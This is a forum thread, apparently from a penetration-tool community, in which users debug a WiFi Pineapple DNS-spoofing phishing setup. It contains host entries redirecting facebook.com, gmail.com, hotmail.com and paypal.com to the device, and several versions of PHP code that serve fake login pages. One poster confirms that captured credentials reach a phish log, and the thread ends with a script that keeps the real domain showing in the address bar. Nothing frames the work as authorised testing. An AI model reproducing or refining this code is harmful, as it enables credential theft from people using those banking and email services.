Jump to content

Dns Spoof


Recommended Posts

Total Noob question

So i've got DNS Spoof enabled on my MK4.

So i enable Karma, connect to a network, attempt to goto facebook.com, then spend the next 10mins or so waiting for facebook.com/redirect.php to load.

Any one else had this issues with redirect taking a long time to execute?

redirect.php code Below

DNS Spoof Host Config Below

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

if (strpos($ref, "gmail")) { header('Location: gmail.html'); }

if (strpos($ref, "hotmail")) { header('Location: hotmail.html'); }

if (strpos($ref, "paypal")) { header('Location: paypal.html'); }

require('error.php');

?>

172.16.42.1 facebook.com

172.16.42.1 www.facebook.com

172.16.42.1 gmail.com

172.16.42.1 www.gmail.com

172.16.42.1 www.hotmail.com

172.16.42.1 hotmail.com

172.16.42.1 www.paypal.com

172.16.42.1 paypal.com

Link to comment
Share on other sites

Anyone?

I'm running the latest FW: 1.1.1

Redirect.php seems to fail.

- already tried changing HTTP_REFERER to HTTP_HOST in redirect.php

- ping -a 172.16.42.1 resolves to hostnames in the DNS Spoof Host file

- ping facebook.com resolves to the real ip of facebook.

- going to facebook/paypal/gmail.com in IE,Firefox,Chrome all results in hostname.com/redirect.php and gets stuck there.

- if i manually goto 172.16.42.1/facebook.htm i'm able to get the page up fine, creds pass through to phish.log just fine.

- have tried to turn dns spoof on/off, power cycle mk4.

Any Ideas?

Link to comment
Share on other sites

Anyone?

I'm running the latest FW: 1.1.1

Redirect.php seems to fail.

- already tried changing HTTP_REFERER to HTTP_HOST in redirect.php

- ping -a 172.16.42.1 resolves to hostnames in the DNS Spoof Host file

- ping facebook.com resolves to the real ip of facebook.

- going to facebook/paypal/gmail.com in IE,Firefox,Chrome all results in hostname.com/redirect.php and gets stuck there.

- if i manually goto 172.16.42.1/facebook.htm i'm able to get the page up fine, creds pass through to phish.log just fine.

- have tried to turn dns spoof on/off, power cycle mk4.

Any Ideas?

If you copied the spoofed .html files from another computer to the usb/pineapple, be sure to check the permissions. Try ls -lah and make sure the flags are set appropriately for read access to all. If not, you can use chmod a+r * in the directory with your .html files.

ETA: I see that you have no problem with directly pulling up the .html files - so just check the redirect.php..

Edited by FreeFallin
Link to comment
Share on other sites

Total Noob question

So i've got DNS Spoof enabled on my MK4.

So i enable Karma, connect to a network, attempt to goto facebook.com, then spend the next 10mins or so waiting for facebook.com/redirect.php to load.

Any one else had this issues with redirect taking a long time to execute?

redirect.php code Below

DNS Spoof Host Config Below

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html'); }

if (strpos($ref, "gmail")) { header('Location: gmail.html'); }

if (strpos($ref, "hotmail")) { header('Location: hotmail.html'); }

if (strpos($ref, "paypal")) { header('Location: paypal.html'); }

require('error.php');

?>

172.16.42.1 facebook.com

172.16.42.1 www.facebook.com

172.16.42.1 gmail.com

172.16.42.1 www.gmail.com

172.16.42.1 www.hotmail.com

172.16.42.1 hotmail.com

172.16.42.1 www.paypal.com

172.16.42.1 paypal.com

did you add the html files to /www/ ?

you could try changing the landing page from url=redirect to url=rickroll.html or what ever your page is called, also note If your files are in other folders in /www/ you need to add that too.

Link to comment
Share on other sites

did you add the html files to /www/ ?

you could try changing the landing page from url=redirect to url=rickroll.html or what ever your page is called, also note If your files are in other folders in /www/ you need to add that too.

Still no Luck.

All files are located in /www

changing permission on redirect.php didnt seem to help, chmod 777 redirect.php.

changing the landing page works - now when i go to facebook.com i get my custom landing page.

So it still looks like the landing page is having an issue loading the redirect.php.

Link to comment
Share on other sites

Still no Luck.

All files are located in /www

changing permission on redirect.php didnt seem to help, chmod 777 redirect.php.

changing the landing page works - now when i go to facebook.com i get my custom landing page.

So it still looks like the landing page is having an issue loading the redirect.php.

maybe a reflash?

what if you add a forward slash "/" before the facebook.html?

if (strpos($ref, "facebook")) { header('Location: /facebook.html'); }

and maybe one on the landing page url=/redirect.php

I found If the url that is being redirected has 1 or multiple folders in the link IE www.someSite.com/folder1/folder2/index.html you can get redirect looped or maybe the error your getting?

To fix that you specify a forward slash in all the web stuff /redirect.php

Edited by petertfm
Link to comment
Share on other sites

maybe a reflash?

what if you add a forward slash "/" before the facebook.html?

if (strpos($ref, "facebook")) { header('Location: /facebook.html'); }

and maybe one on the landing page url=/redirect.php

I found If the url that is being redirected has 1 or multiple folders in the link IE www.someSite.com/folder1/folder2/index.html you can get redirect looped or maybe the error your getting?

To fix that you specify a forward slash in all the web stuff /redirect.php

Starting to feel very noobish, havnt been able to solve this yet, all my files are in /www directly, i tried editing the landing page,redirect.php as you suggested that just seem to put it into a loop.

seems odd i'm the only one having this issue?

Link to comment
Share on other sites

If i edit the redirect.php to say.

<?php include("facebook.htm"); ?>

When i browse to facebook.com it'll redirect me to facebook.com/redirect.php which opens up the facebook.htm file.

so it almost looks like there is something wrong with the original code in redirect.php?

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.htm') ;}

if (strpos($ref, "twitter")) { header('Location: twitter.html') ;}

require('error.php');

?>

Link to comment
Share on other sites

If i edit the redirect.php to say.

<?php include("facebook.htm"); ?>

When i browse to facebook.com it'll redirect me to facebook.com/redirect.php which opens up the facebook.htm file.

so it almost looks like there is something wrong with the original code in redirect.php?

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.htm') ;}

if (strpos($ref, "twitter")) { header('Location: twitter.html') ;}

require('error.php');

?>

sorry I noticed facebook.htm with out the l and a space in between ) and ;

even just try:

header('Location: facebook.html');

Link to comment
Share on other sites

sorry I noticed facebook.htm with out the l and a space in between ) and ;

even just try:

header('Location: facebook.html');

Yeah i was just messing around with the code.

so this is what my current redirect.php is.

<?php

$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) { header('Location: facebook.html') ;}

if (strpos($ref, "twitter")) { header('Location: twitter.html') ;}

require('error.php');

?>

Link to comment
Share on other sites

Got it working.

Had to change my redirect.php to the following.

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE){ header('Location: facebook.htm') ;}

if (strpos($ref, 'gmail') !== FALSE){ header('Location: gmail.htm') ;}

if (strpos($ref, 'paypal') !== FALSE){ header('Location: paypal.htm') ;}

if (strpos($ref, 'hotmail') !== FALSE){ header('Location: hotmail.htm') ;}

require('error.php');

?>

Link to comment
Share on other sites

Got it working.

Had to change my redirect.php to the following.

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE){ header('Location: facebook.htm') ;}

if (strpos($ref, 'gmail') !== FALSE){ header('Location: gmail.htm') ;}

if (strpos($ref, 'paypal') !== FALSE){ header('Location: paypal.htm') ;}

if (strpos($ref, 'hotmail') !== FALSE){ header('Location: hotmail.htm') ;}

require('error.php');

?>

weird? Im glad it was sorted:-)

Link to comment
Share on other sites

Another Stupid question.

I've got facebook.html,twitter.html,gmail.html all in /www

How do i make it so when browsing to facebook.com, it displays as facebook.com not facebook.com/facebook.html, i know this is possible for a single site if renaming to index.php etc.

But how do you manage this with multiple files as they cannot have the same name, without being in subfolders which again would make the url look very suspect.

Any Ideas?

Link to comment
Share on other sites

Another Stupid question.

I've got facebook.html,twitter.html,gmail.html all in /www

How do i make it so when browsing to facebook.com, it displays as facebook.com not facebook.com/facebook.html, i know this is possible for a single site if renaming to index.php etc.

But how do you manage this with multiple files as they cannot have the same name, without being in subfolders which again would make the url look very suspect.

Any Ideas?

maybe try:

include("facebook.html");

replace header('Location: facebook.html'); with the above code.

also you may need to remove/comment out the require function at the end of the php file?

let me know how it works I am curious too.

or try using this It may work I can't test yet. I changed it to else if's because If there happens to be facebook and say gmail in the same url it would trigger both. because we are not redirecting to a page. I hope it works. problem with include is it's not good for folders IE /web/facebook/index.html

&lt;?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) {
    include("facebook.html');
} elseif (strpos($ref, "gmail")) {
    include("gmail.html');
} elseif (strpos($ref, "hotmail")) {
    include("hotmail.html');
} elseif (strpos($ref, "paypal")) {
    include("paypal.html');
} else {
    require('error.php');
}

?&gt;

Edited by petertfm
Link to comment
Share on other sites

maybe try:

include("facebook.html");

replace header('Location: facebook.html'); with the above code.

also you may need to remove/comment out the require function at the end of the php file?

let me know how it works I am curious too.

or try using this It may work I can't test yet. I changed it to else if's because If there happens to be facebook and say gmail in the same url it would trigger both. because we are not redirecting to a page. I hope it works. problem with include is it's not good for folders IE /web/facebook/index.html

&lt;?php
$ref = $_SERVER['HTTP_REFERER'];

if (strpos($ref, "facebook")) {
    include("facebook.html');
} elseif (strpos($ref, "gmail")) {
    include("gmail.html');
} elseif (strpos($ref, "hotmail")) {
    include("hotmail.html');
} elseif (strpos($ref, "paypal")) {
    include("paypal.html');
} else {
    require('error.php');
}

?&gt;

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE) include("facebook.htm");

elseif (strpos($ref, 'gmail') !== FALSE) include("gmail.htm");

elseif (strpos($ref, 'paypal') !== FALSE) include("paypal.htm");

elseif (strpos($ref, 'hotmail') !== FALSE) include("hotmail.htm");

require('error.php');

?>

if you put the above code into your index.php it works just fine. facebook.com shows as facebook.com etc.

Link to comment
Share on other sites

<?php

$ref = $_SERVER['HTTP_HOST'];

if (strpos($ref, 'facebook') !== FALSE) include("facebook.htm");

elseif (strpos($ref, 'gmail') !== FALSE) include("gmail.htm");

elseif (strpos($ref, 'paypal') !== FALSE) include("paypal.htm");

elseif (strpos($ref, 'hotmail') !== FALSE) include("hotmail.htm");

require('error.php');

?>

if you put the above code into your index.php it works just fine. facebook.com shows as facebook.com etc.

great to here:-)

If someone knows a better way, one that works when references .html files located in other folders, what happens with that is any links to mp3's or pictures don't work unless I change the html code with absolute paths

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...